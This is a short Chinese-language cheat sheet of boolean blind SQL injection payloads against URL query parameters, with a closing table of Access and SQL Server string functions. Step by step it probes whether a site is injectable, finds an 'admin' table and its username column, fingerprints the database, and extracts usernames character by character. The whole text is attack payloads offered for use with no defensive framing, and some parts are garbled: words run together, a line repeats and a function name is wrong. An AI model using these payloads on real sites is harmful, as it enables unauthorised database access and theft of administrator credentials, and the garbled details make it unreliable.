| 关键词: nbsp andexists 1111 http 检测 selectidfromadmi url id username ACCESS |
□ 检测可否注入 http://url/xx?id=1111and1=1( 正常页面) http://url/xx?id=1111and1=2( 出错页面) OR JMDCWhttp://url/xx?id=1111'or1=1and'1'='1( 一种页面) http://url/xx?id=1111'or1=2and'1'='1( 另一种页面) □ 检测表段的 http://url/xx?id=1111andexists(select * from admin) □ 检测字段的 http://url/xx?id=1111andexists(selectusernamefromadmin) □ 检测ID http://url/xx?id=1111andexists(selectidfromadminwhereID=1) □ 检测长度的 http://url/xx?id=1111andexists(sel ... wherelen(username)=5 and ID=1) □ 检测长度的 http://url/xx?id=1111andexists(sel ... wherelen(username)=5 and ID=1) □ 检测是否为MSSQL数据库 http://url/xx?id=1111andexists(select * from sysobjects) □ 检测是否为英文 (ACCESS数据库) http://url/xx?id=1111andexists(selectidfromadminwhereasc(mid (username,1,1)) between 30 and 130 and ID=1) (MSSQL数据库) http://url/xx?id=1111andexists(selectidfromadminwhereunicode (substring(username,1,1)) between 30 and 130 and ID=1) □ 检测英文的范围 (ACCESS数据库) http://url/xx?id=1111andexists(selectidfromadminwhereasc(mid (username,1,1)) between 90 and 100 and ID=1) (MSSQL数据库) http://url/xx?id=1111andexists(selectidfromadminwhereunicode (substring(username,1,1)) between 90 and 100 and ID=1) □ 检测那个字符 (ACCESS数据库) http://url/xx?id=1111andexists(selectidfromadminwhereasc(mid (username,1,1))=97 and ID=1) (MSSQL数据库) http://url/xx?id=1111andexists(selectidfromadminwhereunicode (substring(username,1,1))=97 and ID=1) 常用函数 Access:asc(字符) SQLServer:unicode(字符) 作用:返回某字符的ASCII码 Access:chr(数字) SQLServer:nchar(数字) 作用:与asc相反,根据ASCII码返回字符 Access:mid(字符串,N,L) SQLServer:substring(字符串,N,L) 作用:返回字符串从N个字符起长度为L的子字符串,即N到N+L之间的字符串 Access:abc(数字) SQLServer:abc (数字) 作用:返回数字的绝对值(在猜解汉字的时候会用到) Access:A between B And C SQLServer:A between B And C 作用:判断A是否界于B与C之间 〈----〉 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|